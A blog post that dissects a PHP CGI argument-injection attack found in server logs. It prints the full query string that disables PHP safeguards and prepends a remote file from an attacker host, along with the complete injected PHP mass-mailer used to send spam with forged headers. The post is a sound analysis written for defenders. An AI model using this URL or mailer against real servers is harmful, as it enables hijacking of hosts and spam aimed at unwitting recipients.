Dissecting e-mail spamming hack based on PHP CGI

Dissecting e-mail spamming hack based on PHP CGI

Created:24 Jul 2020 18:27:44 , in  Security

In this article, more out of curiosity than for a good reason, I look at one way of how e-mail spam gets sent by hacked PHP CGI setups. The scenario goes like this: a carefully crafted URL changes PHP configuration to enable a remote file inclusion into a script executed by a local PHP CGI setup. The included file consists of a HTML form and a PHP script. The latter sends a message to e-mail addresses specified in the spammer submitted form. Below is how this scenario might show up in your HTTP server's log files and get executed on your server.

URL and input parameters

To include a file with custom code into a local PHP script, a spammer uses a URL like one right below:


/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp://[domain-removed]/x.txt

Once decoded the URL looks like this:


/index.php?-dsafe_mode=Off+-ddisable_functions=NULL+-dallow_url_fopen=On+-dallow_url_include=On+-dauto_prepend_file=http://[domain-removed]/x.txt

Success of options passed in the URL relies on -d switch for PHP interpreter. The switch enables passing configuration options to PHP interpreter:

Here is what configuration options get changed / enabled in the URL:

  • safe_mode - switch off safe mode ( generates error in server logs since PHP 5.4),

  • disable_functions - enable any PHP function for execution,

  • allow_url_fopen - allow retrieval of files from a remote host,

  • allow_url_include - allows inclusion of files from a remote host,

  • auto_prepend - prepend file content.

Once content of file x.txt is successfully prepended, the spammer gets access to the following form (some content in Portuguese language, the script likely originated from Brazil):


<form action="" method="post" enctype="multipart/form-data" name="form1">
  <input type="hidden" name="veio" value="sim">
  <input name="assunto" type="text" value=""class="form" id="assunto">
  <textarea name="html" rows="8" wrap="VIRTUAL" class="form" id="html"></textarea>
  <textarea name="emails" rows="8" wrap="VIRTUAL" class="form" id="emails"></textarea>
<input type="submit" name="Submit" id="enviar" value="Enviar">
</form>

The spammer uses the form to specify e-mail title and message as well as addresses to send spam to.

The form is backed by the following PHP script.


if(isset($_POST['veio'])){
  $testa = $_POST['veio'];
} else {
  $testa = "";
}

if($testa != "") {
  // e-mail message
  $message = $_POST['html'];
  // e-mail subject 
  $subject = $_POST['assunto'];
  // victim addresses
  $to = $_POST['emails'];

  $email = explode("\n", $to);
  $message = stripslashes($message);
	
  $i = 0;
  $count = 1;

  while(isset($email[$i])) {
    $ok = "ok";
    $gera = rand(1,100000);
    $headers  = "MIME-Version: 1.0\n";
    $headers .= "Content-type: text/html; charset=iso-8859-1\n";
    $headers .= "X-Mailer: Microsoft Office Outlook, Build 17.551210\n";
    $headers .= "Content-Transfer-encoding: 8bit\n";
    $headers .= "From: ".$email[$i]."\n";
    $headers .= "Reply-To: $email[$i]\n";
    $headers .= "Return-Path: $email[$i]\n";
    $headers .= "X-Mailer: iGMail [www.ig.com.br]\n";
    $headers .= "X-Originating-Email: $email[$i]\n";
    $headers .= "X-Sender: $email[$i]\n";
    $headers .= "X-iGspam-global: Unsure, spamicity=0.570081 - pe=5.74e-01 - pf=0.574081 - pg=0.574081\r\n";

    // send it
    if(mail($email[$i], $subject." (".$gera.")", $message." (".$gera.")", $headers))
      echo "<font color=gren>* N&#1098;mero: $count <b>".$email[$i]."</b> <font color=LightSeaGreen>ENVIADO....!</font><br><hr>";
    else
      echo "<font color=red>* N&#1098;mero: $count <b>".$email[$i]."</b> <font color=red>ERRO AO ENVIAR</font><br><hr>";
    
    $i++;
    $count++;
  } 

  $count--;
  if($ok == "ok"){
     // end of shipment
     echo "[Fim do Envio]"; 
  }
} 

The only interesting bit apart from headers is mail(). The function is used in the script to send spam to email adresses.

Conclusion

The technique described in this article has been around for a long time and is geared towards older PHP versions and CGI setups. Nonetheless spammers still try to find poorly maintained and vulnerable hosts to leverage it. URLs like the one described in this article show up in my server logs regularly. I'm sure you will find something similar in yours too.

This post was updated on 24 Jul 2020 20:07:26

Tags:  php 


Author, Copyright and citation

Author

Sylwester Wojnowski

Author of the above article, Sylwester Wojnowski, enjoys sWWW writing computer code in PHP, JavaScript and BASH, and some other things he wrote more on on the About page of this website.

Copyrights

©Copyright, 2020 Sylwester Wojnowski. This article may not be reproduced or published as a whole or in parts without permission from the author. If you share it, please give author credit and do not remove embedded links.

Computer code, if present in the article, is excluded from the above and licensed under GPLv3.

Citation

Cite this article as:

Wojnowski, Sylwester. "Dissecting e-mail spamming hack based on PHP CGI." From sWWW - Code For The Web . https://wojnowski.net.pl//main/index/dissecting-e-mail-spamming-hack-based-on-php-cgi

Add Comment

Allowed BB Code - style tags: [b][/b], [i][/i], [code=text][/code],[code=javascript][/code],[code=php][/code],[code=bash][/code],[code=css][/code],[code=html][/code]


I constent to processing my data given through this form for purposes of a reply by the administrator of this website.

Recent Comments

Nobody has commented on this post yet. Be first!